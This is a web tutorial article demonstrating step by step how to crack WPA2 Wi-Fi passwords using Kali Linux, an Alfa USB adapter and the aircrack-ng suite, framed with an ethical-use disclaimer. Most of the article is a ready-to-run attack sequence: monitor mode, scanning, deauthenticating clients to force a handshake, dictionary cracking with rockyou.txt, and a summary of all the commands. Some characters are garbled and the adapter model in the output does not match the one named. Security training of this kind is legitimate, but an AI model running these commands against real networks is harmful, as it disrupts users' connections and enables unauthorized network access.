โ† Back to All Articles

๐Ÿ”“ Hacking of Wi-Fi Passwords using Kali Linux & Alfa AdapterAWS36NHA Series : Step by Step Demo

By Biken Timalsina , Prabin Khanal, Dr Pritam Gajkumar Shah wsnpgs@gmail.com Posted on 24 Jul 2025
Area of Article:
WiFi Pen Testing, Cyber Security, WiFi security, Brute Force Attack

โš ๏ธ Disclaimer: This guide is intended for educational and ethical penetration testing only. Unauthorized access to wireless networks is illegal and punishable by law. Use it only on networks you own or have explicit permission to test.

Abstract


In this tech article, we have demonstrated step by step process of ethical hacking of WiFi password using Kali Linux and an Alfa USB Wi-Fi adapter that supports monitor mode and packet injection. The wifi adapter is configured in the monitor mode using airmon-ng, and nearby Wi-Fi networks are scanned with airodump-ng. Once the target network is identified, a handshake is captured by deauthenticating connected clients using aireplay-ng, forcing them to reconnect. The captured handshake file is then analyzed using aircrack-ng with a dictionary wordlist such as rockyou.txt built in Kali Linux. If the password matches any entry in the list, it says that password found.


Key terms: Kali Linux, Alfa wifi Adapter, Brute force attack, etc.


Introduction


In this demo we used the following tools:



๐Ÿงฐ Tools Used



  • Kali Linux 2023.4 (running inside VirtualBox)

  • Alfa AWUS036NHA / AWUS036ACH WiFi USB Adapter (AU$69 price approximately)

  • aircrack-ng suite (pre-installed on Kali Linux)



Step-by-Step Guide



๐Ÿงฉ Step 1: Connect Alfa Adapter in Kali (VirtualBox)


In VirtualBox: Devices → USB → Atheros UB91C or similar


Confirm detection:


lsusb

ALFA Network AWUS036AXML 802.11axe WiFi 6E USB 3.0 Adapter AXE3000, Tri Band 6 GHz, Gigabit Speed up to 3Gbps



๐Ÿ“ก Step 2: Enable Monitor Mode


iwconfig

If interface is wlan0, run:


sudo airmon-ng check kill

sudo airmon-ng start wlan0

This creates a new interface: wlan0mon





๐Ÿ“ถ Step 3: Scan for WiFi Networks


sudo airodump-ng wlan0mon

Identify your target WiFi — e.g., Galaxy A42 5G67C7 on channel 6, BSSID 3E:E6:70:8A:D2:72





๐Ÿ“‚ Step 4: Capture WPA2 Handshake


sudo airodump-ng --bssid 3E:E6:70:8A:D2:72 --channel 6 -w galaxy wlan0mon

This saves packets to galaxy-01.cap





๐Ÿ“ค Step 5: Deauthenticate Clients


sudo aireplay-ng --deauth 10 -a 3E:E6:70:8A:D2:72 wlan0mon

Wait for a handshake to appear:


WPA Handshake: 3E:E6:70:8A:D2:72



๐Ÿ” Step 6: Crack the Handshake


sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 3E:E6:70:8A:D2:72 galaxy-02.cap

If successful:


KEY FOUND! [ password ]



๐Ÿงผ Step 7: Stop Monitor Mode


sudo airmon-ng stop wlan0mon

sudo service NetworkManager restart



๐Ÿ› ๏ธ Optional: Custom Wordlist


Create a custom password file:


echo "Galaxy2024" > ~/Desktop/mylist.txt

Then use:


sudo aircrack-ng -w ~/Desktop/mylist.txt -b 3E:E6:70:8A:D2:72 galaxy-01.cap


๐Ÿ“Œ Summary of All Commands



sudo airmon-ng check kill

sudo airmon-ng start wlan0

sudo airodump-ng wlan0mon

sudo airodump-ng --bssid [BSSID] --channel [CH] -w [file] wlan0mon

sudo aireplay-ng --deauth 10 -a [BSSID] wlan0mon

sudo aircrack-ng -w [wordlist] -b [BSSID] [file.cap]

sudo airmon-ng stop wlan0mon

sudo service NetworkManager restart


๐ŸŽ“ Educational Use Cases



๐Ÿ” Security awareness training

๐Ÿ‘จ‍๐Ÿซ Cybersecurity lab sessions for students

๐Ÿ” Network security testing in ethical hacking environments


โœ”๏ธ Tip: Combine this setup with crunch or hashcat for advanced brute-force and GPU cracking experiments.


Published by ausjournal.com – Cybersecurity & Wireless Security Insights

๐Ÿ“Ž Related Articles